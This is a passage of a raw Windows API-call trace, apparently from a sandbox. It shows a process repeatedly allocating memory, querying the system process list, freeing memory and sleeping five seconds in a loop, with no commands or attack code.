BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.329] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.353] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.368] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.420] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 